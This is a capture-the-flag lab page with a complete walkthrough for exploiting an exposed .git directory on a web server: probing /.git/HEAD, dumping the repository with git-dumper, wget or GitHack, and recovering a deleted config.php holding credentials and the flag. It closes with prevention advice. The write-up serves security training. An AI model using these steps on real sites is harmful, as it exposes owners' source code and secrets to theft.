Avatar

Labs / Git Exposed

  • Challenge
  • Released 22 Oct 2025

What secrets lie hidden in the commit history?

A corporate website looks ordinary, but beneath its surface lurks a developer's mistake that exposes everything. An exposed .git directory sits on the production server, ready to reveal its secrets to anyone who knows where to look. Dive into version control history, reconstruct deleted files, and uncover sensitive information that should never have made it to production. Can you extract the flag from the depths of Git history?

1
Flags
5
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🔓 Git Exposed - Complete Solution

Objective: Discover and exploit an exposed .git directory to extract sensitive information from the repository's commit history.
🔍 Step 1: Discovering the Exposed Repository

When you access the challenge, you'll see a standard corporate website. The vulnerability lies in an exposed .git directory that shouldn't be publicly accessible.

Testing for .git Exposure:

Try accessing these URLs directly:
<target-ip>/.git/HEAD
<target-ip>/.git/config

If these return content (like ref: refs/heads/master for HEAD), the .git directory is exposed and you can proceed with downloading it.
Why This Works: Developers sometimes deploy entire Git repositories to production servers instead of building clean artifacts. When web servers aren't configured to block access to hidden directories, the entire version control history becomes publicly accessible.
📥 Step 2: Downloading the Repository

Once you've confirmed the .git directory is accessible, you need to download it. There are several effective methods:

Method A: Using git-dumper (Recommended)

This specialized tool reconstructs repositories even when directory listing is disabled:

# Install git-dumper
pip3 install git-dumper

# Download the repository
git-dumper <target-ip>/.git/ ./downloaded-repo

# Navigate to the downloaded repository
cd downloaded-repo

Method B: Using wget (Manual)

If git-dumper isn't available, use wget to recursively download:

wget --mirror --no-parent --reject="index.html*" \
     --convert-links --adjust-extension \
     <target-ip>/.git/

Method C: Using GitHack

Another popular tool for downloading exposed repositories:

git clone https://github.com/lijiejie/GitHack.git
cd GitHack
python GitHack.py <target-ip>/.git/
🔎 Step 3: Analyzing the Repository History

With the repository downloaded, you can now analyze its complete history to find sensitive information.

Basic Git Commands:

# View commit history
git log --oneline

# View detailed history with changes
git log --stat

# Search for deleted files
git log --diff-filter=D --summary

# Search for specific content in history
git log --all -S 'flag'
git log --all -S 'password'
git log --all -S 'config'
What to Look For: Pay attention to commit messages mentioning "security", "remove", "delete", "credentials", or "config". These often indicate cleanup commits where sensitive data was removed from the working directory but remains in Git history.
🎯 Step 4: Extracting Deleted Files

Files deleted from the working directory remain in Git history and can be recovered. The flag is hidden in a deleted configuration file.

Finding Deleted Files:

# List all deleted files
git log --diff-filter=D --summary | grep delete

# Search for config.php specifically
git log --all -- config.php

You'll find commits mentioning config.php:
• One commit added it (contains the flag)
• A later commit removed it (security cleanup)

Recovering the File:

Once you identify the commit that added config.php, view its contents:

# Show file from specific commit
git show <commit-hash>:config.php

# Or view the commit before deletion
git show HEAD~X:config.php

The config.php file contains database credentials, API keys, and the flag defined as a PHP constant.
Finding the Flag: Look for a line like define('FLAG', '...'); in the deleted config.php file. This is your challenge flag.
🔧 Step 5: Alternative Search Methods

If you're having trouble locating the flag, try these advanced techniques:

Search All Commits for UUID Pattern:

# Search for UUID-formatted strings
git grep -E '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}' \
    $(git rev-list --all)

Search Commit Messages:

# Look for flag-related commits
git log --all --grep='flag' -i
git log --all --grep='config' -i

View All File Changes:

# See what changed in each commit
git log --all --oneline --name-status
📚 Learning Points
  • Git History is Permanent: Deleted files remain accessible in commit history unless explicitly purged
  • Deployment Security: Never deploy .git directories to production - use build artifacts instead
  • Web Server Hardening: Configure nginx/Apache to block access to hidden directories
  • Sensitive Data: Never commit credentials, API keys, or flags - use environment variables
  • Git Secrets: Tools like git-secrets can prevent accidental credential commits
Real-World Prevention: Block .git access in nginx with location ~ /\.git { deny all; return 404; } and use proper CI/CD pipelines that deploy only necessary files, never entire repositories.